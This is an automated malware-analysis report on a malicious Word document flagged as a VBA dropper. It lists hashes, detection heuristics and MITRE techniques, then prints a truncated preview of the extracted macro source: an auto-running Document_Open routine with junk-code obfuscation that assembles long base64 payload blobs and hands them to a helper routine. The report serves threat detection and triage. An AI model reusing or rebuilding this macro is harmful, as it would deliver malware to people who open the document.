Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cacda69378396423…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 126.0 KB
Created: 2018-08-21 19:39:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 29f849eedfcb01e988d5b61c679bed57
SHA-1: d4876415d21613350bc875fb3a2a536f133bf1f4
SHA-256: cacda69378396423259ee3702e2812b4193e1d8592c9a358d10165971d47fc14
Risk score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 (Visual Basic)
  • T1204.002 (Malicious File)

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, which is commonly used to execute downloaded payloads. The 'Document_Open' macro suggests automatic execution upon opening the document. The ClamAV detection name 'Doc.Dropper.Agent-6957340-0' further supports its nature as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6957340-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6957340-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20229 bytes
SHA-256: 1afa3e86dac67787ee18735fb187f7727e9ddadbef614c2f9e8cdc71e7c9cb73
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 3 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 23 < 153 Then
' rRXLqb9k
Else
' bYmjxqoM
MsgBox "hOXmCz"
End If
If 41 * 20 = 1507 - 1492 Then
UDRU1Pvc3 = "dy2NZ"
End If
RqwpncQ = 16007
HM13Kiqo = UDRU1Pvc3 & RqwpncQ
Y9oX0 = "WTI5a2"
n0KtjR = "FXNW5YVG82VlZSR09DNUhaWFJUZEhKcGJtY29XMU41YzNSbGJTNURiMjUyWlhKMFhUbzZSbkp2YlVKaGMyVTJORk4wY21sdV"
iglhm3Cw5 = "p5Z2tZMjlrWlNrcE8zUnllWHRwWlhnb0pHSmhjMlUyTkNrN2ZXTmhkR05vZTNkeWFYUmxMV2h2YzNRZ0pGOHVaWGhqWlhCMGFXOXVMbTFsYzNOaFoyVTdmUT09"
If 35 * 29 = 1075 - 1065 Then
ufXhc = "zixAzX"
End If
JAeut41 = "hrLoeUN3E"
mtKguQ = ufXhc & JAeut41
If 35 * 29 = 1075 - 1065 Then
dRnwg = "Qs1642yHI"
End If
GjeTpk = 64585
GDKT8 = dRnwg & GjeTpk
Dim ufE6w
ufE6w = Y9oX0 & n0KtjR & iglhm3Cw5
Rb5makF = "Y0c5M1pYSnphR1ZzYkNBa1kyOWtaU0E5SUNkS1NFSm9aRWRuWjFCVFFXbE1hVFZqWTBoV01HUklhM1ZhV0doc1NXcHpaMHBJWkdwSlJEQm5ZbTFXTTB4WE9Xb"
uCunYNe5U = "GhiVlpxWkVOQ2RWcFlVWFZrTWxacFdUSjRjRnBYTlRCUGVVRnJaREpOZFZwSE9UTmliWGgyV1ZkU2JXRlhlR3hMUTBwdlpFaFNkMDlwT0haa2JrNXlaVmRPZVZwWFJqQmhWemwxWTNrMWFtSXlNSFprV0VKcldWaFNiRmg2UlhWTlJFbDFXbGhvYkVscGQyZEtTRUpvWkVkbmNFOTVRbnBrUjBaNVpFTXhkMk50T1dwYVdFNTZTVU5TZDFsWVVtOVBkejA5Snpza1ltRnpaVFkwSUQwZ1cxTjVjM1JsYlM1VVpYaDBMa1Z1"
If 26564 / 116 = -4805 + 4810 Then
p0EwBQDZ = "tcKZuV"
End If
t3IhV4 = 37112
xz1enc7DS = p0EwBQDZ & t3IhV4
If 26564 / 116 = -4805 + 4810 Then
Ld2mf = "NxN063"
End If
gJMq0U = "iM4cB"
bbcOJS = Ld2mf & gJMq0U
Dim fh3TI
fh3TI = Rb5makF & uCunYNe5U
Dim Ov3UReVm9
Ov3UReVm9 = 180
While Ov3UReVm9 <= 989
Ov3UReVm9 = Ov3UReVm9 + 28
Wend
OoYHA = "OzvXsPFJR"
Y9bwp = OdCwe & Ov3UReVm9
ALVd5iS = fh3TI & ufE6w
If 60 < 249 Then
' hWFVJsi
Else
' gG98HAFD
MsgBox "U1z4jcw"
End If
If 60 < 249 Then
' XNnJ0R91
Else
' YIKvi
MsgBox "B8mIakQ"
End If
If 557 + 42 = -3564 + 3573 Then
L7abYJ3N = "SGwsvRTyl"
End If
b0e1l = 60970
MAkoK4 = L7abYJ3N & b0e1l
If 913 + 8 = -887 + 901 Then
VuxZ01 = "YJYhs8"
End If
bM6CLp95v = 49749
kKvs9dTm = VuxZ01 & bM6CLp95v
If 913 + 8 = -887 + 901 Then
ERXExK72 = "mZR6LTV23"
End If
qmydU = "KtNr2u"
Jg57b1V = ERXExK72 & qmydU
Call Stalin(ALVd5iS)
End Sub

Attribute VB_Name = "TetEf"
Sub Stalin(BdEgBu6Y)
If 625 - 4 = -1525 + 1538 Then
RO271AKth = "WD89cpvsG"
End If
HtqbOSij0 = "k6ESx5kO2"
R6H3rV = RO271AKth & HtqbOSij0
If 42 < 206 Then
' lItSB
Else
' ySBPN1
Debug.Print "zPX0F"
End If
If 461 - 58 = 11352 / 946 Then
R6Iig = "GTNMd4"
End If
f2Nguyp = 50341
ky4NuTEY = R6Iig & f2Nguyp
If 53 < 137 Then
' ykeWRXFxP
Else
' eoFVGPc
Debug.Print "P7uG32NlT"
End If
If 46 < 165 Then
' h8mgoQR
Else
' ZKqGOI
MsgBox "W4ikW"
End If
If 24 < 183 Then
' QDWTqyxnw
Else
' JqwL46P0
Debug.Print "af4aRe1"
End If
If 261 - 82 = 13656 / 2276 Then
w8Kaw = "iv6Yjq"
End If
GPChQr0O = 29416
LBTmFA = w8Kaw & GPChQr0O
If 20 < 252 Then
' DgnCd5pmG
Else
' fqB2d3JVT
Debug.Print "okNCZL3VA"
End If
If 39 < 170 Then
' abeKoC
Else
' szMHy8j
MsgBox "t4She5I"
End If
If 39 < 170 Then
' Iau6vFb
Else
' it8wUgf
MsgBox "Nydpu9S"
End If
Dim E2mFy
E2mFy = 204
While E2mFy < 318
E2mFy = E2mFy + 32
Wend
oDqofNGsA = 41355
kUNo4C = ykvJ4 & E2mFy
If 16 < 245 Then
' q0lUO
Else
' sQB3iAFSs
Debug.Print "e5qLBS"
End If
If 31083 / 39 = 8752 / 1094 Then
uedgxW = "JYxDtZ"
End If
XgPRF035 = 13544
BAqhC = uedgxW & XgPRF035
If 59 < 132 Then
' l1nKyY
Else
' UBinp8QtC
MsgBox "UiOvDnu"
End If
If 867 - 26 = -871 + 883 Then
DIWc5kZ = "t1ylG8"
End If
iTVjB = "gafuUIP"
rej3u7Qob = DIWc5kZ & iTVjB
If -53 + 168 = 2414 - 2406 Then
u5ghbJ = "cLYse63o9"
End If
xqF9w = 18288
OkeNCV = u5ghbJ & xqF9w
Dim f98hZD
f98hZD = 194
While f98hZD < 988
f98hZD = f98hZD + 58
Wend
bAaUw = "UcSoh4"
n3AbW0 = Nonw9pyA & f98hZD
If 306 - 82 = 13986 / 999 Then
B6k4XS = "ywHbW"
End If
mYnXd4Wlr = "cR6JvgZsh"
e3Tutxm = B6k4XS & m
... (truncated)